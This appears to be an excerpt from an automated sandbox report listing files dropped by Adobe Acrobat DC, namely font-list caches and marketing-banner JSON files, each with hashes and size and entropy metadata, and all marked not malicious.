                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:PostScript document text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):10880
                                                                                                                  Entropy (8bit):5.214360287289079
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                                                  MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                                                  SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                                                  SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                                                  SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                                                  Malicious:false
                                                                                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.5324

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:PostScript document text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):10880
                                                                                                                  Entropy (8bit):5.214360287289079
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                                                  MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                                                  SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                                                  SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                                                  SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                                                  Malicious:false
                                                                                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):295
                                                                                                                  Entropy (8bit):5.362047569096434
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXFSD5i/z+0HR+FIbRI6XVW7+0YezoAvJM3g98kUwPeUkwRe9:YvXKXFwY/J0YpW7v8GMbLUkee9
                                                                                                                  MD5:ED8917C1C273D9C264A665863A276C42
                                                                                                                  SHA1:CB28898649CE7CDF1271732F20C4AF04F6AE0383
                                                                                                                  SHA-256:D115EA22E5FFB9452090640E9CB7AF22B5C96F5BF9D3B3AF42DC182E617E910A
                                                                                                                  SHA-512:D8FDDC879ED5826BD631FF88EBC50BB361B13DDE9FE827C7319E71531DBE63558B6A2340E5B2C6DBCADC8FF58F35FD68C36FCF409D0BAF502E54378684D06A07
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"27f2b6e1-61c6-42f8-87bc-5d2d7b58b9ab","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735108229443,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):294
                                                                                                                  Entropy (8bit):5.301359973341853
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXFSD5i/z+0HR+FIbRI6XVW7+0YezoAvJfBoTfXpnrPeUkwRe9:YvXKXFwY/J0YpW7v8GWTfXcUkee9
                                                                                                                  MD5:392CA2A56F53325914C960DA4F31472A
                                                                                                                  SHA1:6C0CF0253DAB04597853D22C97B17D54FD7E974B
                                                                                                                  SHA-256:9F696D97DFC2BE6D40B6969DC2A5DA7066412E824DB7BA1A5EFDCA6E27E2C07C
                                                                                                                  SHA-512:1610287168E4391D865A9530A43C861FA830450D69C7080C7E5AA8A6D3CFEF108DAF1B4A69291F5446C484444FE5A53CD7BC73C8786E020CA3262ED94A951371
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"27f2b6e1-61c6-42f8-87bc-5d2d7b58b9ab","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735108229443,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):294
                                                                                                                  Entropy (8bit):5.27961946869966
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXFSD5i/z+0HR+FIbRI6XVW7+0YezoAvJfBD2G6UpnrPeUkwRe9:YvXKXFwY/J0YpW7v8GR22cUkee9
                                                                                                                  MD5:4C1464B9BBCCFC13DC3500C420B1EE10
                                                                                                                  SHA1:E728738E6269B68376FC200A47767C35D779A514
                                                                                                                  SHA-256:2F5C48B10856586F0CF93DECE446B431147320687434DB3802596C6AB5297F7C
                                                                                                                  SHA-512:0249B3086843BF67E3036ACBD94CC88F18D4079758638DC1EE4CE59C6C8126E61E48A52C0359CF068F471D6ED6BC453CD4DF19FDB0C5449378093AD21157B76B
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"27f2b6e1-61c6-42f8-87bc-5d2d7b58b9ab","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735108229443,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):285
                                                                                                                  Entropy (8bit):5.340894277725081
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXFSD5i/z+0HR+FIbRI6XVW7+0YezoAvJfPmwrPeUkwRe9:YvXKXFwY/J0YpW7v8GH56Ukee9
                                                                                                                  MD5:044340EA2F7C00D6D971E0ABAD106265
                                                                                                                  SHA1:65D59661367D7F073D4468D4B52AD6994358294A
                                                                                                                  SHA-256:BC9D09D2888EA8B999E470A29880F40EA6B7FB45FAC1B8E47C90B4BD42F40BB9
                                                                                                                  SHA-512:1DA6D071B17A0F2A23C0737A97F06ADDB2674F549460DF30C1232F8CC03B01DDDED86D1BC79C26FC16FEE887F62D02712C967BEB614F15DAE45785338276854E
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"27f2b6e1-61c6-42f8-87bc-5d2d7b58b9ab","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735108229443,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1123
                                                                                                                  Entropy (8bit):5.691590806235584
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:Yv6XjBliBpLgE9cQx8LennAvzBvkn0RCmK8czOCCSZ:Yv0BMBhgy6SAFv5Ah8cv/Z
                                                                                                                  MD5:79BECD4D9429BF4248C226E011B094A4
                                                                                                                  SHA1:6513A99726E834302AF033424D0A7FC7D3002E60
                                                                                                                  SHA-256:B702D236C001F4356D50968F758346D00A8710B8ED7312796BC563ECB95418E2
                                                                                                                  SHA-512:98B2AEA182E4E7AF4FBFA42DC353AABA125BE9F41AE0BDB37C17A5D6A92B926A0719CE2EF05F06613CBB5BE0611A75CB0CFCAA44E22DE4FB6EA60511751ED6E5
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"27f2b6e1-61c6-42f8-87bc-5d2d7b58b9ab","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735108229443,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):289
                                                                                                                  Entropy (8bit):5.286547477331463
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXFSD5i/z+0HR+FIbRI6XVW7+0YezoAvJf8dPeUkwRe9:YvXKXFwY/J0YpW7v8GU8Ukee9
                                                                                                                  MD5:F4F0511D0909BC85DFC4379179DD1E84
                                                                                                                  SHA1:E30ECEAC2EE34E72B865CF404FDA3F9BD6651AB5
                                                                                                                  SHA-256:554F4F4D781F33096B517146019BDA47A116536196DB04ED301BFA4622B9DC18
                                                                                                                  SHA-512:D47BB7729FDC4AF62D10D57E289E286B0A54847BCCD9B9A355F87FFF0DA8A2A5F0ACCD7C76DFFAC31C359176E5FEC3C6B5D5905227E49F4775D049F3BCD7B324
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"27f2b6e1-61c6-42f8-87bc-5d2d7b58b9ab","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735108229443,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):292
                                                                                                                  Entropy (8bit):5.287640889612643
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXFSD5i/z+0HR+FIbRI6XVW7+0YezoAvJfQ1rPeUkwRe9:YvXKXFwY/J0YpW7v8GY16Ukee9
                                                                                                                  MD5:A9BB974861B7BD1F076E1449ADBA32A1
                                                                                                                  SHA1:626525B510516096DBF19ADDFB15B53510C75A54
                                                                                                                  SHA-256:4D7A0C5C6035A62B155760E2A102390D45376A4CC7285A5869B672CE53A0714B
                                                                                                                  SHA-512:AC1306B8E44F3FFC573A11AB6899BD78E4870433A3E56D860D9A20164B2029E7DF132916DF7FBC56A331D947AF38DF06BC3CA0C7A8EF1730FE8A7CA23D2A57B4
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"27f2b6e1-61c6-42f8-87bc-5d2d7b58b9ab","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735108229443,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):289
                                                                                                                  Entropy (8bit):5.307064536519335
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXFSD5i/z+0HR+FIbRI6XVW7+0YezoAvJfFldPeUkwRe9:YvXKXFwY/J0YpW7v8Gz8Ukee9
                                                                                                                  MD5:7403E570FF81D7CD49C6DB4BEB248F32
                                                                                                                  SHA1:900D2EB9C4521EE10BECD1FDCF2E62DE3F920FB0
                                                                                                                  SHA-256:09F2BE1648948A9F5710D98F00A33B78BB8F7067006E10DF4BB72FC6A637E41B
                                                                                                                  SHA-512:BB34BDD359AE30C4AE3C850CD6D28341C6CDA8986200EBDBEA9C55D17F8B496124F818D1BCCB1E269348CDB9CA4594CE84683A56AE4F161DE6086F7018CD3293
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"27f2b6e1-61c6-42f8-87bc-5d2d7b58b9ab","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735108229443,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):295
                                                                                                                  Entropy (8bit):5.314563206585413
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXFSD5i/z+0HR+FIbRI6XVW7+0YezoAvJfzdPeUkwRe9:YvXKXFwY/J0YpW7v8Gb8Ukee9
                                                                                                                  MD5:F5D98942666BA910EE500F97E2F86F91
                                                                                                                  SHA1:70A85599E9B23B8D7A9CDFF3FF5C0FD0179E814C
                                                                                                                  SHA-256:784A44BF556857DEF28D9225C78C03313B423F9B772666D146E73487567E9A80
                                                                                                                  SHA-512:6CB93D453A7FE207BA8E8102C0B9FA965ECED109F6EAEA513E7F5F0EC638A9E2B2FB6F54A24B4E55A077209E8C01E2EA9233CA5FDFDA0F2418F7DC9A97FD0843
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"27f2b6e1-61c6-42f8-87bc-5d2d7b58b9ab","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735108229443,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):289
                                                                                                                  Entropy (8bit):5.294813468703568
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXFSD5i/z+0HR+FIbRI6XVW7+0YezoAvJfYdPeUkwRe9:YvXKXFwY/J0YpW7v8Gg8Ukee9
                                                                                                                  MD5:5BE3CA6E84C9E6D844A08A90D9DEEF02
                                                                                                                  SHA1:492396A289A210C7009191D12925D61069A5210B
                                                                                                                  SHA-256:4CA178DD655CA5B8A066D00B066476E9360FFA23476C7DADAED8A76CF4A64E60
                                                                                                                  SHA-512:10D98C766144BA96CDB41D0773EA99129D2376CFB97E8D11AD266A2EB6B183D75C46AB7F33C85F3E425807FFA3E62785617ACE3B9C925C8762F394E91291FB3F
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"27f2b6e1-61c6-42f8-87bc-5d2d7b58b9ab","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735108229443,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):284
                                                                                                                  Entropy (8bit):5.280772529355729
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXFSD5i/z+0HR+FIbRI6XVW7+0YezoAvJf+dPeUkwRe9:YvXKXFwY/J0YpW7v8G28Ukee9
                                                                                                                  MD5:1D01F8430EDE3B27D5B84D31BE99C4DD
                                                                                                                  SHA1:1447E629D82C0C7F987EE95605108402BC9F5810
                                                                                                                  SHA-256:F5853DB2EA007C6C2C5E8999DD5BF1261D1A52BB28A1ED9C7846091B96416E7E
                                                                                                                  SHA-512:DC4729F120C99A5F38FDA6896DDFAF5788E3758DF3C9CCB4CDE74A626C548A71D39507381CEAFFA1EC6F2FCB3FA236021613C812BB8A5C29A51DDC8572E301B9
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"27f2b6e1-61c6-42f8-87bc-5d2d7b58b9ab","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735108229443,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):291
                                                                                                                  Entropy (8bit):5.2783962126406365
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXFSD5i/z+0HR+FIbRI6XVW7+0YezoAvJfbPtdPeUkwRe9:YvXKXFwY/J0YpW7v8GDV8Ukee9
                                                                                                                  MD5:9CDCE4163FD336B84A0F15A703E530E3
                                                                                                                  SHA1:5AE8EA7F72C48D759CF63583B06F67E559E49077
                                                                                                                  SHA-256:DEAE6499E7BBD1D44A9102BA7FA911D303216A982FE211DAA62317F6DD67A36B
                                                                                                                  SHA-512:454741F83636990F9AE8A956BBB70B66372E35984B5A59CB8DF5DD72A92203988BE8FCD8D4EEA661627CBC40AA45664FFFFEBCFDE73C71C75A340BC212D45B77
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"27f2b6e1-61c6-42f8-87bc-5d2d7b58b9ab","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735108229443,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):287
                                                                                                                  Entropy (8bit):5.2796832619744585
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXFSD5i/z+0HR+FIbRI6XVW7+0YezoAvJf21rPeUkwRe9:YvXKXFwY/J0YpW7v8G+16Ukee9
                                                                                                                  MD5:9C4E4087DD5F2F1D2990E5E34C0D4E05
                                                                                                                  SHA1:774BDECE43646BCFE9D4530AD82C370428888C91
                                                                                                                  SHA-256:3D9113D99022A81F22162822C49967F1601D7D5180DDD18DEFA684CFBB2F8920
                                                                                                                  SHA-512:3CD44EE31BBD3BB2B87C4285C5856E8EC657759111F9CA77F2B218CE7F422CAFB1CCA1E84F309D9D2B6BC0CC622C07E3823DAF6238D1F6F933DB0FCA336DF4BC
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"27f2b6e1-61c6-42f8-87bc-5d2d7b58b9ab","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735108229443,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1090
                                                                                                                  Entropy (8bit):5.665477180140632
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:Yv6XjBliBamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSZ:Yv0BMNBgkDMUJUAh8cvMZ
                                                                                                                  MD5:AACFC1F9E59BB64F0BA1A059BF8CE64D
                                                                                                                  SHA1:AD2E5FD003067FE9A17E92A552A2600C82DCC578
                                                                                                                  SHA-256:8A3A096FBE9DF99956C3DCBCE1B51D0CF6B4C78CC6956F0B6CF9FD2DABB589F8
                                                                                                                  SHA-512:91F53871D8EB72CCEF36BB48D31781C4BEC42AC663E4CF56F4118650F6D1D2397D3883A39FAA345DCA1452B4B0FC7A0320501C9758F099B33E0CE5A339C68335
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"27f2b6e1-61c6-42f8-87bc-5d2d7b58b9ab","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735108229443,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):286
                                                                                                                  Entropy (8bit):5.254297700500945
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXFSD5i/z+0HR+FIbRI6XVW7+0YezoAvJfshHHrPeUkwRe9:YvXKXFwY/J0YpW7v8GUUUkee9
                                                                                                                  MD5:AE7632F3BF986BBD8D7CF75B24981B10
                                                                                                                  SHA1:01774A5FAB88C2B228A6A776830DAC9DF84E8801
                                                                                                                  SHA-256:B17C0D5E59C898A250E74186B9D43F222FD4F9B618E5A12CA6CD581510EBCFF7
                                                                                                                  SHA-512:9173A34E01976CA74F9CE16E6A5A44022BBC0A5A1C9FBA06E03D9D4806E68ED804B12061A01CA1DFB1B428F867E94C793F7E43BD20D7A996D6BA50AA6B2A025A
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"27f2b6e1-61c6-42f8-87bc-5d2d7b58b9ab","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735108229443,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):282
                                                                                                                  Entropy (8bit):5.26340554698471
                                                                                                                  Encrypted:false
